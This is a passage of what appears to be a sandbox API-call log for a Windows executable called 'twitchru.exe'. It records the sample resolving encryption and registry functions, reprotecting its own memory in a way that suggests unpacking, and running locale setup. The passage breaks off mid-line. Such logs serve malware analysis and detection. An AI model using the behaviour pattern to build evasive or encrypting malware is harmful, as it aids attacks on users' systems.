GetProcAddress (hModule=0x75260000, lpProcName="GetVersionExW") returned 0x7527a2a0 [0119.175] GetProcAddress (hModule=0x75260000, lpProcName="VirtualAlloc") returned 0x75278b70 [0119.175] GetProcAddress (hModule=0x75260000, lpProcName="VirtualProtect") returned 0x75278c50 [0119.175] GetProcAddress (hModule=0x75260000, lpProcName="VirtualFree") returned 0x75278c70 [0119.175] GetProcAddress (hModule=0x75260000, lpProcName="ReleaseSemaphore") returned 0x752860a0 [0119.175] GetProcAddress (hModule=0x75260000, lpProcName="InterlockedPopEntrySList") returned 0x77cf8ef0 [0119.175] GetProcAddress (hModule=0x75260000, lpProcName="InterlockedPushEntrySList") returned 0x77cf8ed0 [0119.175] GetProcAddress (hModule=0x75260000, lpProcName="InterlockedFlushSList") returned 0x77d01ee0 [0119.175] GetProcAddress (hModule=0x75260000, lpProcName="QueryDepthSList") returned 0x77cf98c0 [0119.176] GetProcAddress (hModule=0x75260000, lpProcName="UnregisterWaitEx") returned 0x7527eb50 [0119.176] GetProcAddress (hModule=0x75260000, lpProcName="LoadLibraryW") returned 0x7527a0b0 [0119.176] GetProcAddress (hModule=0x75260000, lpProcName="RtlUnwind") returned 0x75279a80 [0119.176] GetProcAddress (hModule=0x75260000, lpProcName="RaiseException") returned 0x75279ec0 [0119.176] GetProcAddress (hModule=0x75260000, lpProcName="HeapAlloc") returned 0x77cdda90 [0119.176] GetProcAddress (hModule=0x75260000, lpProcName="ExitThread") returned 0x77d02570 [0119.176] GetProcAddress (hModule=0x75260000, lpProcName="GetModuleHandleExW") returned 0x75279fa0 [0119.176] GetProcAddress (hModule=0x75260000, lpProcName="HeapFree") returned 0x752725e0 [0119.176] GetProcAddress (hModule=0x75260000, lpProcName="HeapReAlloc") returned 0x77cdbae0 [0119.177] GetProcAddress (hModule=0x75260000, lpProcName="ExitProcess") returned 0x752874f0 [0119.177] GetProcAddress (hModule=0x75260000, lpProcName="GetCommandLineA") returned 0x7527a3c0 [0119.177] GetProcAddress (hModule=0x75260000, lpProcName="GetCommandLineW") returned 0x7527a4b0 [0119.177] GetProcAddress (hModule=0x75260000, lpProcName="GetACP") returned 0x75278770 [0119.177] GetProcAddress (hModule=0x75260000, lpProcName="GetFileType") returned 0x75286390 [0119.177] GetProcAddress (hModule=0x75260000, lpProcName="IsValidLocale") returned 0x7527a3f0 [0119.177] GetProcAddress (hModule=0x75260000, lpProcName="GetUserDefaultLCID") returned 0x75282350 [0119.178] GetProcAddress (hModule=0x75260000, lpProcName="EnumSystemLocalesW") returned 0x7527f9e0 [0119.178] GetProcAddress (hModule=0x75260000, lpProcName="FlushFileBuffers") returned 0x752862a0 [0119.178] GetProcAddress (hModule=0x75260000, lpProcName="GetConsoleCP") returned 0x75286860 [0119.178] GetProcAddress (hModule=0x75260000, lpProcName="GetConsoleMode") returned 0x75286870 [0119.178] GetProcAddress (hModule=0x75260000, lpProcName="SetFilePointerEx") returned 0x75286540 [0119.178] GetProcAddress (hModule=0x75260000, lpProcName="GetProcessHeap") returned 0x75277910 [0119.178] GetProcAddress (hModule=0x75260000, lpProcName="FindFirstFileExA") returned 0x75286220 [0119.179] GetProcAddress (hModule=0x75260000, lpProcName="IsValidCodePage") returned 0x7527a090 [0119.179] GetProcAddress (hModule=0x75260000, lpProcName="GetOEMCP") returned 0x7527fd10 [0119.179] GetProcAddress (hModule=0x75260000, lpProcName="GetEnvironmentStringsW") returned 0x7527a3b0 [0119.179] GetProcAddress (hModule=0x75260000, lpProcName="FreeEnvironmentStringsW") returned 0x7527a0f0 [0119.179] GetProcAddress (hModule=0x75260000, lpProcName="SetEnvironmentVariableA") returned 0x752a2560 [0119.179] GetProcAddress (hModule=0x75260000, lpProcName="SetStdHandle") returned 0x752a26a0 [0119.180] GetProcAddress (hModule=0x75260000, lpProcName="ReadConsoleW") returned 0x752868e0 [0119.180] GetProcAddress (hModule=0x75260000, lpProcName="CreateFileW") returned 0x75286180 [0119.180] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77150000 [0119.180] GetProcAddress (hModule=0x77150000, lpProcName="ShowWindow") returned 0x771852a0 [0119.180] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76a10000 [0119.181] GetProcAddress (hModule=0x76a10000, lpProcName="CryptDeriveKey") returned 0x76a45b70 [0119.181] GetProcAddress (hModule=0x76a10000, lpProcName="RegCreateKeyExA") returned 0x76a2f510 [0119.181] GetProcAddress (hModule=0x76a10000, lpProcName="RegSetValueExA") returned 0x76a30750 [0119.181] GetProcAddress (hModule=0x76a10000, lpProcName="RegCloseKey") returned 0x76a2efa0 [0119.181] GetProcAddress (hModule=0x76a10000, lpProcName="CryptAcquireContextA") returned 0x76a30c00 [0119.182] GetProcAddress (hModule=0x76a10000, lpProcName="CryptReleaseContext") returned 0x76a30ad0 [0119.182] GetProcAddress (hModule=0x76a10000, lpProcName="CryptDestroyKey") returned 0x76a2fc10 [0119.182] GetProcAddress (hModule=0x76a10000, lpProcName="CryptDestroyHash") returned 0x76a2fbf0 [0119.182] GetProcAddress (hModule=0x76a10000, lpProcName="RegGetValueA") returned 0x76a30da0 [0119.182] GetProcAddress (hModule=0x76a10000, lpProcName="CryptHashData") returned 0x76a2f950 [0119.182] GetProcAddress (hModule=0x76a10000, lpProcName="CryptCreateHash") returned 0x76a2f930 [0119.183] GetProcAddress (hModule=0x76a10000, lpProcName="CryptEncrypt") returned 0x76a45bd0 [0119.183] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77ab0000 [0119.452] GetProcAddress (hModule=0x77ab0000, lpProcName="CryptStringToBinaryA") returned 0x77af8040 [0119.452] GetProcAddress (hModule=0x77ab0000, lpProcName="CryptDecodeObjectEx") returned 0x77ae4470 [0119.452] GetProcAddress (hModule=0x77ab0000, lpProcName="CryptImportPublicKeyInfo") returned 0x77afde80 [0119.452] GetProcAddress (hModule=0x77ab0000, lpProcName="CryptBinaryToStringA") returned 0x77ad2290 [0119.452] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x20ba908 | out: lpflOldProtect=0x20ba908*=0x40) returned 1 [0119.452] VirtualProtect (in: lpAddress=0x401000, dwSize=0x3a098, flNewProtect=0x20, lpflOldProtect=0x20ba908 | out: lpflOldProtect=0x20ba908*=0x40) returned 1 [0119.453] VirtualProtect (in: lpAddress=0x43c000, dwSize=0x132d4, flNewProtect=0x2, lpflOldProtect=0x20ba908 | out: lpflOldProtect=0x20ba908*=0x40) returned 1 [0119.453] VirtualProtect (in: lpAddress=0x450000, dwSize=0x34a0, flNewProtect=0x4, lpflOldProtect=0x20ba908 | out: lpflOldProtect=0x20ba908*=0x40) returned 1 [0119.453] VirtualProtect (in: lpAddress=0x454000, dwSize=0x1e0, flNewProtect=0x2, lpflOldProtect=0x20ba908 | out: lpflOldProtect=0x20ba908*=0x40) returned 1 [0119.453] VirtualProtect (in: lpAddress=0x455000, dwSize=0x3984, flNewProtect=0x2, lpflOldProtect=0x20ba908 | out: lpflOldProtect=0x20ba908*=0x40) returned 1 [0119.454] GetProcAddress (hModule=0x74e70000, lpProcName="FlsSetValue") returned 0x74f23770 [0119.454] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74e70000 [0119.454] GetProcAddress (hModule=0x74e70000, lpProcName="InitializeCriticalSectionEx") returned 0x74f23ae0 [0119.454] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74e70000 [0119.454] GetProcAddress (hModule=0x74e70000, lpProcName="FlsAlloc") returned 0x74f26530 [0119.454] GetLastError () returned 0x7a [0119.455] GetProcAddress (hModule=0x74e70000, lpProcName="FlsGetValue") returned 0x74f1a7b0 [0119.455] GetProcAddress (hModule=0x74e70000, lpProcName="FlsSetValue") returned 0x74f23770 [0119.455] GetStartupInfoW (in: lpStartupInfo=0x20ba874 | out: lpStartupInfo=0x20ba874*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4240f0, hStdOutput=0xc737e743, hStdError=0xfffffffe)) [0119.455] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0119.455] GetFileType (hFile=0x38) returned 0x2 [0119.455] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0119.455] GetFileType (hFile=0x3c) returned 0x2 [0119.455] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0119.455] GetFileType (hFile=0x40) returned 0x2 [0119.455] GetCommandLineA () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe\" " [0119.455] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe\" " [0119.455] GetACP () returned 0x4e4 [0119.455] IsValidCodePage (CodePage=0x4e4) returned 1 [0119.455] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20ba894 | out: lpCPInfo=0x20ba894) returned 1 [0119.455] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20ba15c | out: lpCPInfo=0x20ba15c) returned 1 [0119.455] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20ba770, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0119.455] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20ba770, cbMultiByte=256, lpWideCharStr=0x20b9ef8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ") returned 256 [0119.455] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ", cchSrc=256, lpCharType=0x20ba170 | out: lpCharType=0x20ba170) returned 1 [0119.455] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20ba770, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0119.455] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20ba770, cbMultiByte=256, lpWideCharStr=0x20b9ea8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0119.455] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x74e70000 [0119.456] GetProcAddress (hModule=0x74e70000, lpProcName="LCMapStringEx") returned 0x74f13690 [0119.456] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0119.456] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x20b9c98, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0119.456] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x20ba670, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xaf\xaf\x78\xc5\xac\xa8\x0b\x02\x38\x22\x43", lpUsedDefaultChar=0x0) returned 256 [0119.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20ba770, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0119.456] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20ba770, cbMultiByte=256, lpWideCharStr=0x20b9ec8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳳BĀ") returned 256 [0119.456] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳳BĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0119.456] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳳BĀ", cchSrc=256, lpDestStr=0x20b9cb8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0119.456] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x20ba570, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d